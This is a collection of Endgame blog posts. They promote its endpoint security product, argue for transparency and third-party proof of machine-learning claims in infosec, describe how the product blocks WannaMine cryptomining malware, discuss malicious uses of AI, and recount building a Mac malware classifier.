• Endgame is the only vendor to implement the most advanced model of attacker techniques and technology, MITRE’s ATT&CK matrix. Our commitment both to cover it with protections and to extend it with research is unique, and we’re the only vendor to be evaluated by MITRE itself.   
• Endgame’s use of machine learning is the gold standard, with outstanding prevention efficacy in public testing with AV Comparatives and SE Labs.  The excellence of our capability is available for the world to see in VirusTotal.  Moreover, we’re honest about what ML can and cannot do.
• Our hardware-assisted control-flow integrity (HA-CFI™) feature is the only proven protection technology that inspects running hardware, offering extensive visibility and protections below the OS.
• Artemis, the industry’s first (and only) natural language user interface, enables quick, efficient operations and SOC response to sophisticated attacks.
• Endgame is the only single-agent autonomous solution delivering converged EPP and EDR functions across the Department of Defense. Within weeks of initial training, a junior operator armed with Endgame can be effective against nation-state attacks. And it’s not just for the most cutting-edge government agencies anymore. Endgame is ripping out legacy AV in commercial customers and protecting some of the most-attacked large enterprises in the Fortune 100.

Don’t just take our word for it. Read what analysts, testing organizations, and customers have to say. Endgame is the only single-agent endpoint security solution spanning the full range of MITRE ATT&CK techniques, achieving the highest efficacy ratings, and delivering true ease-of-use.

So, what’s next? We must never be complacent. Attackers are capable, committed, well-resourced and incentivized to improvise, adapt, and innovate. We know that what protects today may be circumvented tomorrow. With that in mind, we will continue to provide bleeding-edge protection against the most advanced tactics. In addition to our Windows protection and advancing our ML-based detections, we are now delivering best-in-industry Mac protection. We must continue to listen to our customers who are on the front lines, innovating in areas beyond detection, expanding our partner integration ecosystem and continuing to enhance the user workflow and experience.

We are thrilled to be among the few in Gartner’s visionary quadrant, and I’m gratified to lead a team that doesn’t view this as an excuse for self-congratulation, but rather as a call to action to look over the ridgeline and anticipate what is next for the attackers and our customers. This will never change as we grow and continue to redefine endpoint security. If you want the peace of mind that comes with having the best-possible protections deployed against the most sophisticated attackers, then contact us to give Endgame a try. We have a proven track record of delivering on our vision to protect some of the most-attacked institutions in the world, from the Pentagon to Wall Street.

Download a copy of the full Gartner Magic Quadrant for Endpoint Protection Platforms.

Replace your legacy AV or incomplete “next-gen” solution with Endgame today.

Over the last several years, various waves of machine learning (ML) adoption have disrupted information security products and services.  Based on my limited retention of electromagnetic wave propagation theory from undergraduate studies, the idiomatic use of waves seems wholly appropriate.  The market reaction to ML has been not unlike a transverse wave that displaces particles in orthogonal directions even while delivering energy to its target.  Indeed, ML in infosec has delivered on its promise in many areas, but some combination of excitement, mystique, and hype has unnecessarily confounded the fundamental strengths of what ML can achieve, muddying the impact.  A few headlines from 2017 provide evidence of the market’s growing veiled skepticism, caveated celebration, and muted enthusiasm:

A.I. faces hype, skepticism at RSA cybersecurity show

Artificial Intelligence Will Revolutionize Cybersecurity: But Security Leaders Must View All Vendor Claims With Skepticism

Do you need AI? Maybe. But you definitely need technology that works

It is within this landscape that I make a not-so-audacious prediction for infosec machine learning in 2018: this year will mark the swell of the “Prove It!” wave for Machine Learning, which I hope will adjust the equilibrium of clarity, trust, and honesty for the better.  I’ll outline some of the forcing functions along with the boundary conditions and challenging scattering surfaces that are channeling this wave in 2018.  In other words, I’ll define the drivers behind “Prove It!” and the obstacles and policies that will ultimately shape it.

Forcing Functions

There is a growing demand for transparency in creating machine learning models, including explicit means to challenge model predictions, access and understanding of the data driving the models, and buzzword-free clarity in marketing solutions that leverage them.  This triad is driving a “Prove It!” wave in 2018 that is also shaped by societal and political forces. First, self-correction within the ML research community has instigated a move away from ad hoc model-building to a seek-to-understand approach that may include (gasp!) proofs and guarantees. Next, government regulations such as the EU’s General Data Protection Regulation aim to protect users from the consequences of unchallenged “black box” decisions. Finally, infosec customers are exhausted from blind reliance or incomplete information regarding ML capabilities and just want protection and usability, no matter how it is built. I’ll address each of these in more detail below.

Provable and Reproducible ML Research

Ali Rahimi gave a clarion if not somewhat controversial call for renewed emphasis in reproducible research at the NIPS machine learning conference last year.  He compared some trends, particularly in deep learning, to the medieval practice of Alchemy. “Alchemy ‘worked’,” Ali admitted.  “Alchemists invented metallurgy, ways to dye textiles, our modern glass-making processes, and medications.  Then again, Alchemists also believed they could cure diseases with leeches, and turn base metals into gold.”  

Adapting Ali’s metaphor to security, we believe machine learning is a powerful tool for detecting malicious tools and behavior. And for the record, we also believe in the appropriate use of deep learning. However, we don’t believe that machine learning will soon displace effective rules or, especially, hardworking infosec professionals.  Furthermore, when machine learning is powering, say, a photo-sharing app, then an Alchemist-like “let’s see if this works?” approach is acceptable.  But, this is infosec. We’re protecting customer networks, their endpoints, and their data.  Our customers deserve the reassurance that technology--machine learning or otherwise--is built on a bedrock of thorough knowledge, verifiability, and rigor.

To be clear, much of machine learning (including deep learning) is already built on that solid bedrock. For example, at Endgame, we carefully evaluated machine learning models for malware detection based on detection rate, memory, and CPU footprint.  We even attack our own machine learning models to understand weaknesses and ensure that models are robust to worst-case adaptation of an adversary.

My call for 2018 is to continue to address what is still particularly needed in ML infosec research: more cross-pollination between academia and industry, more open community engagement from security vendors, and more open datasets for reproducible research.  By doing this, we’ll continue to move ML in infosec from the dark arts of Alchemy to rigorous Science.

Transparency in Algorithmic Decision-Making

The European Union’s forthcoming General Data Protection Regulation (GDPR) introduces comprehensive rules about the collection, storage, and processing of personal information.  In addition to implementing corporate accountability for responses to breaches, a hearty majority of the law grants citizens specific rights related to personal data, including full transparency about how data is used, access to data at any time, to object to certain uses of the data, and the “right to be forgotten”.

In Article 22, the GDPR also addresses algorithmic decision-making to formulate “safeguards for the rights and freedoms of the data subject” for data processing that “produces legal effects” or “similarly significantly affects” the citizen.  Among the phrases in the GDPR is a “right to an explanation”.  The legal bounds and scope of applicability of “right to an explanation” may be debated, but I believe this is the whitecap of a broader swell: the call for more transparency in “black box” ML.  It is welcome and contributes to the mounting “Prove It!” pressure in 2018.  If asked, can you explain how your ML model arrived at its decision?  It will no longer be acceptable to blame algorithms for unintended consequences.

Importantly, ML models are not all created equally, and each may require a different technique to describe decision-making.  For example, a nearest-neighbor classifier naturally justifies its decision using case-based reasoning: your file was predicted “malicious” because it is similar to *this* known malicious file.  Decision trees provide a human-interpretable algorithm for justifying decisions, although, perhaps, awkwardly verbose.  Ensembles like random forests and gradient-boosted decision trees blur this simplicity because decisions are based on a committee of such trees, which are more awkward to concisely summarize.  Instead, one often reverts to listing features most commonly queried to derive the result, delivering information similar to feature importance in a linear model.  The greatest burden for clarity is still likely with deep learning models which today rely on sensitivity analysis, saliency maps, relevance propagation, or visualizing attention mechanisms, which unfortunately may amount to mere blobography for all but the data scientist shepherding the model.  Still, other methods like LIME are model-agnostic ways to implement explainable AI or interpretable ML.

The point is that although some models may reach impressive predictive performance, it may not be clear what information in the data directly determine the decisions.  Ironically, machine learning is such that even with full access to the source code and data, it may still be very difficult to determine *why* a model made a particular decision.  In some cases, there may be a trade-off: would you rather have a predictor be right 99% of the time, but not know why, or be right 97% of the time, but with a satisfactory explanation?  For some applications, such as medical diagnosis, “black box” decision-making may be considered irresponsible.  The use of explainable features and human-interpretable ML models are a foundation for providing guarantees about a diagnosis. Beyond that, interpretability enables verification.  Understanding the model enables model improvement.  And, in some cases, it may empower an infosec customer with important context about an incident.

One purpose of the GDPR is to protect users from algorithmic impact of their data, with “right to an explanation” as one safeguard.  Some would argue that “explainable AI” is holding models and algorithms to a higher standard than humans.  As Marvin Minsky, one of the fathers of AI noted, “No computer has ever been designed that is ever aware of what it’s doing.  But most of the time, we aren’t either.”  Still, at the very least, public policy and regulations are pushing us gently away from “black box” to “glass box” algorithmic decision-making.  My call for 2018 is to ride this early swell in infosec.  If the physicist’s mantra is Feynman’s “What I cannot create, I do not understand,” then the infosec data scientist should adopt, “What cannot be understood, should be deployed with care.”

Show me the money!

The final “Prove It!” pressure is rooted in industry fatigue.  In 2018, “because it uses ML” will hardly be an acceptable answer to a question about whether one product provides better protection than another. At the end of the day, whether a customer’s infrastructure is protected far outweighs how it is protected.  

The frenzy of ML is clearly not limited to information security, as it has come to symbolize the leading edge of technological innovation.  Indeed, the projected outpacing in AI research by China has been called a “Sputnik moment” for the United States, with some fear of a widening research gap.  Information security is sure to benefit from any unified energy behind an AI “space race” in the long run.  However, the stark reality remains that customers are being breached today and are hungry for the best solution for the problem at hand, regardless of whether it is imminently headed to space.

Fortunately, there are technique-agnostic methods to compare solutions. We have previously argued that AV can be compared apples-to-apples to ML by comparing both false positive and true positive rates, for example, whereas “accuracy” is wholly inadequate and may hide all manner of sins. Customers are increasingly demanding answers to these and other “right questions”.  Second, where data are non-existent or resources impractical for evaluating products in-house, customers can turn to agnostic third-party testing. In the endpoint security space, vendors are beginning to offer holisticbreach tests rather than AV-only tests, which help customers value a broader protection landscape.

My call for 2018 is for companies to finally move beyond selling “because it uses ML” to address what really matters: “because it has been shown to protect customers (in third-party tests, even!)”.

A self-fulfilling prediction?

I am advocating a “Prove It!” trend in infosec ML as much as I am predicting it.  And I’m certainly not alone: data scientists I talk to throughout the infosec community welcome the rigor, the transparency, and the honesty. For data scientists, this means bringing more attention to “process” into what has been a maniacal drive for “outcome”. Let’s make our research reproducible.  Let’s do our best to understand our models and provide explanations to users when appropriate, legal pressures or not.  As that culture changes, consumers can, conversely, invest confidently in successful outcomes, rather than shiny processes. As a now-mature staple in information security, let’s let ML prove itself, and allow customers to demand results, no matter how it’s built.

Cryptomining malware has garnered significant attention in light of a range of disconnected and impactful incidents, including attacks on water utilities, hospitals, Android devices and government websites. With the cryptocurrency market anticipated to hit $1 trillion in 2018, the recent surge in cryptomining malware is not surprising. In cryptomining attacks, attackers often hijack a computer through unauthorized access, consuming CPU cycles from its victims to inject scripts enabling the pooled mining of cryptocurrencies. Similar to other attacks, cryptomining malware often gains a foothold through legitimate software, altering widely used website software to insert a malicious script. This causes the computer of a visitor to an affected site to mine cryptocurrencies, slowing down the system to the point of unusability in some cases.

One of the most impactful cryptomining malware to date is WannaMine, which integrates the self-propagating capabilities and ETERNALBLUE exploit found in the WannaCry ransomware. Unlike some instances of cryptomining malware where the attack takes place in the browser, WannaMine has characteristics similar to other forms of malware. This has some advantages from the attacker point of view.  An in-browser script-based attack only runs when the browser window is open.  A malware-based miner can run whenever the computer is on. WannaMine employs a range of behaviors, including credential theft, lateral movement, persistence, and the malicious use of Powershell. The Endgame platform catches the various TTPs at numerous stages throughout our layered defenses. We’ll describe this latest cryptomining attack, demonstrate how the Endgame platform stops the cryptomining malware, and discuss the potential evolution of cryptomining attacks in the years ahead.

WannaMine Overview

The WannaMine family of cryptominers is one of the most widespread in the wild. The name reflects the shared ETERNALBLUE heritage of WannaCry, the self-propagating ransomware that struck over 150 countries and caused hundreds of millions of dollars in damage last year. WannaMine achieves broad lateral movement through credential harvesting, and then relies on the ETERNALBLUE SMB exploit for additional lateral movement and living off the land to gain persistence and evade detection.

During the earliest stages of infection, WannaMine uses the native PowerShell framework to download and execute a series of PowerShell scripts onto the victim computer. Depending on the architecture of the system, additional scripts corresponding to that architecture are downloaded and executed in a chain of behavior that eventually creates and launches a malicious WannaMine cryptominer application.

Stopping WannaMine

Endgame successfully blocked the execution of WannaMine before it computed a single hash. MalwareScore® identified the nature of the malicious file and prevented execution as depicted in Figure 1. Organizations with access to VirusTotal Intelligence can confirm MalwareScore® detection of numerous WannaMine samples as well as other cryptominer variants.

Figure 1: Endgame’s MalwareScore®  prevents execution of WannaMine

This malware family doesn’t deploy a WannaMine payload until several other unauthorized actions occur, including the execution of PowerShell to download and run a number of scripts to the victim computer. Figure 2 shows a timeline view from Endgame Resolver™, which depicts the suspicious command line arguments passed to PowerShell and is caught by our tradecraft analytics. These arguments launch PowerShell in a hidden window that a user wouldn’t see and execute a script, “info6.ps1”, which corresponds to the 64-bit test system we used. WannaMine uses a number of heavily-obfuscated PowerShell scripts to perform system profiling and download operations during the early stages of infection, behaviors Endgame quickly prioritizes for analysts so action can be taken before a WannaMine outbreak.

Figure 2: Tradecraft analytics alert on the initial execution of malicious PowerShell scripts

Conclusion

Cryptomining malware hijacks machines to consume their CPU cycles and use them as vehicles for mining cryptocurrencies. This can cause networks to slow down and has the potential for widespread business disruption, especially if it impacts business-critical applications. WannaMine is one of the more prominent variants of crytpomining malware. It contains several of the key characteristics exhibited by other forms of malware, such as a self-propagating nature, integration of an open source exploit, and access via legitimate third-party software, as well as common tactics such as credential harvesting, lateral movement, and persistence. Like other forms of malware, cryptomining malware is likely to innovate and potentially limit the CPU usage to help evade detection. Fortunately, even as these attacks evolve, Endgame’s multi-layer protections will continue to protect against cryptomining malware and the broad range of attacker techniques before they can cause damage to enterprise networks.  

Heading into 2018, some of the most prominent voices in information security predicted a ‘machine learning arms race’ wherein adversaries and defenders frantically work to gain the edge in machine learning capabilities. Despite advances in machine learning for cyber defense, “adversaries are working just as furiously to implement and innovate around them.”  This looming ‘arms race’ points to a larger narrative about how artificial intelligence (AI) and machine learning (ML) -- as tools of automation in any domain and in the hands of any user -- are dual-use in nature, and can be used to disrupt the status quo. Like most technologies, not only does AI and ML provide more convenience and security as a tool for consumers, but each can be exploited by nefarious actors as well.

A joint publication released today by researchers from Oxford, Cambridge, and other organizations in academia, civil society, and industry (including Endgame) outlines “the landscape of potential security threats from malicious uses of artificial intelligence technologies and proposes ways to better forecast, prevent, and mitigate these threats.”  Unfortunately, there is no easy solution to preventing and mitigating the malicious uses of AI, since the tools are ultimately directed by willful actors.  While the report touches on physical, political and digital security, we’d like to provide some additional context around the potential malicious use of machine learning by attackers in information security, and highlight defender takeaways.

Treading Carefully

Information security has been a beneficiary of rapid advancements in “narrow” AI, mostly limited to machine learning for a specific task.  For example, at Endgame we’ve applied machine learning for best-in-class malware detection and created an artificially intelligent agent, Artemis, to elevate and scale defenders.  However, the technologies that enable these advances are dual-use: gains witnessed by the defender may soon also be leveraged by attackers. Researchers and AI practitioners must be aware of potential misuse of this technology and be proactive in promoting openness and establishing norms around the appropriate use of AI. In fact, the AI community could look to the security industry as a potential path forward in developing norms and addressing safety and ethics concerns (e.g. responsible disclosure, algorithmic bias).

Red Teaming AI

The report presents a broad spectrum of views about the future impact of AI. At Endgame, we see the rapid adoption of AI in the infosec community as overwhelmingly positive in the balance, but with a need for careful and thoughtful deployment. Sophisticated adversaries today generally do not require artificial intelligence to be effective, but instead rely on network and human vulnerabilities that the attacker understands and exploits. But, as the report points out, and as we have discussed elsewhere, we’ll very likely see the offensive use of AI in the wild in the coming months and years.  This sentiment has been echoed elsewhere, and should not come as a surprise. There’s been significant research demonstrating how, at least theoretically, AI can scale digital attacks in unprecedented ways. In the malware domain, automation is already enabling worms like Mirai and WannaCry. The potential for future attacks that leverage automation and the malicious use of AI requires a thoughtful defensive strategy to counter them. Thus, while we’re not clamoring that the sky is falling, we do feel an obligation to raise awareness.

In fact, in a partnership with the University of Virginia, Endgame has been pro-activelyinvestigatinghow machine learning might be used by an adversary to bypass machine learning malware defenses. This research helps us understand at a technical level what the nature of such an attack may look like, and think proactively about blind spots in our defenses. In technical terms, by attacking our own machine learning models, we can teach them about their own weaknesses, while also providing valuable human intelligence feedback on the corner cases discovered by AI-enabled white-hat attacks.

Beyond Technology

Mitigating the malicious use of AI must be more than technical.  As the report highlights, end user awareness, laws and societal norms, policies, and proper deterrents are perhaps even more critical.  Indeed, the paper makes several high-level recommendations for:

1. Policymakers to work closely and collaborate with technical researchers to investigate, prevent and mitigate potential malicious use of AI;

2. Researchers and engineers in AI to consider the dual-use nature of this work as they design products;

3. Fostering collaboration amongst a broader set of stakeholders, including researchers, policymakers and other stakeholders, to become more involved in ethical discussions of the potential challenges and mitigations of AI.

The infosec field lies at a unique and critical intersection of artificial intelligence and its potential misuse.  The lack of norms in the digital domain compounds the allure and effect of the nascent use of AI by adversaries.  At the same time, our industry is especially well versed in the healthy paranoia of thinking about adversaries. In infosec we do red teaming. We do formal verification. We promote responsible disclosure of software vulnerabilities. These same themes are aptly applied to AI in information security, and could be a model for the security of AI in general.

A Microsoft ad about AI aired during the 2018 Winter Olympics carries a relevant message: “In the end, it’s only a tool. What’s a hammer without the person who swings it? It’s not about what technology can do, it’s about what you can do with it.”  AI and ML will continue to disrupt information security, just as they are disrupting other industries. Adversaries constantly seek to innovate, and therefore we should prepare for and expect novel implementations of AI and ML as attacks evolve. In turn, defenders must smartly integrate AI and ML to optimize the human workflows and elevate defensive capabilities in preparation for whatever adversaries attempt next. Overall, we believe that AI and information security will rapidly evolve in tandem in the coming years, but due to the dual-use of this technology a proactive effort is required to ensure we stay ahead of motivated attackers.

Last year, we introduced Endgame MalwareScore®, a machine learning malware detection and protection engine for Windows Portable Executable (PE) files. Since its release, MalwareScore has proven capable in detecting emergent malware and resilient against bypass. For example, recent research from Recorded Future stated that MalwareScore was the only classifier in VirusTotal that detected malware signed with particular counterfeit certificates. Beginning today, MalwareScore now supports macOS.  We are extremely confident in our new Mac support, which has been released in VirusTotal for the world to see!

Mac support is a major enhancement which required overcoming many challenges that we didn’t encounter when we created MalwareScore for Windows.  We faced three primary challenges during development. First, there is a lack of good open source tools for parsing Mach-O (binaries run on macOS) files.  Second, our internal data pipelines and infrastructure were built with the specific use case of processing PE files (Windows binaries). Third, and most difficult, we had limited training data. This post will walk through each of these challenges and how we overcame them.

Lack of Open Source Mach-O Parsers

When looking at Windows PE files, there are tools that do a tremendous job parsing the files. We instantly gravitated towards Ero Carrera's PEFile parser for our initial R&D efforts, allowing Endgame data scientists to jump right into in-depth feature engineering. Once we were ready to productionize our Windows classifier, we implemented our own highly optimized PE parser to ship with our product. Unfortunately, there is no parallel in the world of Mac Mach-O files. There are some nice command line utilities such as Jonathan Levin’s JTool for parsing Mach-O files, but they weren’t built for our use case and would not scale to the order of millions.  Other tools like Quarkslab’s LIEF have a lot of potential, but were not mature enough when we first started our research into a Mach-O classifier.  Ultimately, we had to roll our own static parser to best support our research.

Fortunately, there are a lot of good references for learning about Mach-O file formats.  We recommend reading the Mach-O file format reverence and Jonathan Levin’s book macOS and iOS Internals, Volume III: Security & Insecurity. We used these heavily in implementing our static parsers and as a reference during feature engineering.

Retooling Our Data Pipeline

There are significantly fewer unique Mac Mach-O files in the wild than PE files, so scale in our pipeline was of little concern.  However, there were small details that forced significant changes in how we process, store, and format data.  The first detail that required refactoring was the paradigm of Mach-O Universal Binaries (or Fat files).  These files are essentially a small header with one to many standard Mach-O files concatenated together. The issue is that it's possible to have both malicious and benign Mach-O files contained in the same Fat file!  Additionally, Endgame only supports Intel architectures (macOS), so other architectures such as ARM-based iOS and older Mac architectures using PowerPC packaged in the same Fat file are of little to no use to us in our training data.  Sifting through all this created some complexity we didn’t anticipate going into the effort.

In addition, much of our pipeline is backed by SQL, which makes for fast and expressive querying, but does not handle fundamental changes in data formatting. Instead of bolting on a change, we fundamentally changed our table structures for better support of new file types. Extensibility gives us the option to extend to new types in the future but, of course, led us to a huge data migration. As anyone that has done data migration will tell you, it is a very long and painful process, especially when you have deadlines to meet!

Another seemingly small but important detail is that of magic bytes. Magic bytes occur at the beginning of a file so that their type can be inferred from something other than the file extension. For example, Fat Mach-O files begin with 0xcafebabe.  Unfortunately, Java class files also start with the same four bytes. This means a deeper parsing needs to occur when data is being mined.  A naïve approach of just pulling in files with those magic bytes will leave you with a large amount of useless data, and you’ll wonder why the number of samples with successfully extracted features is much smaller than expected (I speak from experience!).   

Lack of Training Data

Many of us were skeptical when we first started out on this journey to create MalwareScore for Mac.  Our primary concern was the lack of data.  More specifically, we were legitimately concerned about a lack of malicious data, and rightly so. To demonstrate the stark difference in data availability between PE files and Mach-O files, we took three day’s worth of data in VirusTotal for both PE files and Mach-O files (Intel Architecture) and compared the breakdown of malicious versus benign.  We define malicious files as those with at least five detections. This is not a perfect labeling scheme, but good enough for a high-level analysis and for demonstration purposes.

The two pie charts below demonstrate the general disparity in file types and are scaled to represent the total number of samples for each file type (2.7 million PE files and 94,000 Mach-O files).  There are two key conclusions to ascertain from these charts.  First, there are far more files in VirusTotal for Windows than Mac.  Second, there is very little Mac malware.  About 46% of PE files submitting during this time are malicious while 1.5% of Mach-O files are malicious.

The pie chart on the left reflects the malware distribution for PE files, while the smaller one on the right reflects the Mac distribution. The size of the pie charts reflects data availability and the small population problem when classifying Mac malware.

We took several steps to help ameliorate this situation. As is common practice for imbalanced learning problems, we incorporated class weights when training our classifier.  However, we discovered that adjusting the class weights to simulate a fifty-fifty class balance was suboptimal in our experiments.  Instead, we performed a grid search on class weights and discovered that our problem preferred much stronger weighting of benign files, while still achieving high true positive rates.

We also expanded data sources beyond narrowly scoped or biased sample distributions.  As researchers, we must fight the urge to only grab as much data as we can from VirusTotal and other similarly biased data sources to build our classifiers.  This is obviously easier said than done, but was very important for us to do.  Three easy ways to potentially expand data sources include grabbing Mach-O files from a clean and freshly installed macOS, adding known benign open source software, and incorporating customer data.  The problem with these solutions is that they do little to help class imbalance as they heavily favor benign data.  Without adding additional and diverse malicious Mach-O files, your classifier is likely to overtrain and not generalize to new malware. You’ll need to be more creative to make a production-level classifier!

Conclusion

Endgame MalwareScore® for Mac is now live in VirusTotal!  This release was the culmination of lots of hard work by many engineers, data scientists, and other researchers.  This post outlined several challenges we faced during its development and we hope it will help others as they extend their machine learning AV to support Mac. We are proud of Endgame MalwareScore® and now MalwareScore for Mac, and believe it is important to provide transparency into the range of data challenges we encounter in building product-grade machine learning malware classifiers.  In the coming weeks we’ll post additional details on performance!